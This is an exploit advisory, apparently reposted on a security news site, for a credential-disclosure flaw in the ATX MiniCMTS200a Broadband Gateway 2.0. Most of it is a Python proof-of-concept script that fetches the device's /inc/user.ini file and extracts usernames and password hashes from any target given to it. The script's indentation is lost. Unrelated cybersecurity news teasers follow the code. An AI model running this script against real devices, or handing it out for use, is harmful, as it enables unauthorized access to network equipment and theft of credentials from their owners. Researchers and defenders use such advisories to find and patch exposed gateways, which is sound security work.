# Exploit Title: ATX MiniCMTS200a Broadband Gateway 2.0 - Credential Disclosure
# Exploit Author: Zagros Bingol
# Vendor Homepage: http://www.atx.com
# Software Link: https://atx.com/products/commercial-services-gateways/minicmts200a-broadband-gateway/
# Version: 2.0 and earlier
# Tested on: Debian 10 64bit
-------------------------------------
Endpoint:
http://www.ip/domain.com/inc/user.ini
--------------------------------------
Proof-of-Concept:
#!/usr/bin/python3
#License: GNU General Public license v3.0
#Author: Zagros Bingol(Zagrosbingol@outlook.com)
import requests
import re
target = input("Target(ex:http://host): \n")
port = input("Port: \n")
def sploit(target, port):
print("ATX/PicoDigital MiniCMTS200a Broadband Gateway v2.0 -
Credential Disclosure\n")
r = requests.post(target + ":" + port + '/inc/user.ini')
searching = re.findall(r"\[.{1,8}\]", str(r.text))
print("Usernames:\n")
print(", ".join(searching).replace("[", "").replace("]", ""))
def hash():
r = requests.post(target + '/inc/user.ini')
searching = re.findall(r"([a-fA-F\d]{32})", str(r.text))
print("Hashes:\n")
print(", ".join(searching).replace("[", "").replace("]", ""))
hash()
sploit(target, port)
This post was last modified on 30 November 2020 3:53 PM
British high street chain WH Smith has recently revealed that it was hit by a…
As banks worldwide roll out Voice ID as a means of user authentication over the…
In the era of digital transformation, cybersecurity has become a major concern for businesses. When…
In today's digital age, cybersecurity threats have become a significant concern for businesses of all…
The RIG Exploit Kit is currently in the midst of its most productive phase, attempting…
One of the most transformational technologies of our time, artificial intelligence (AI), has quickly come…
Leave a Comment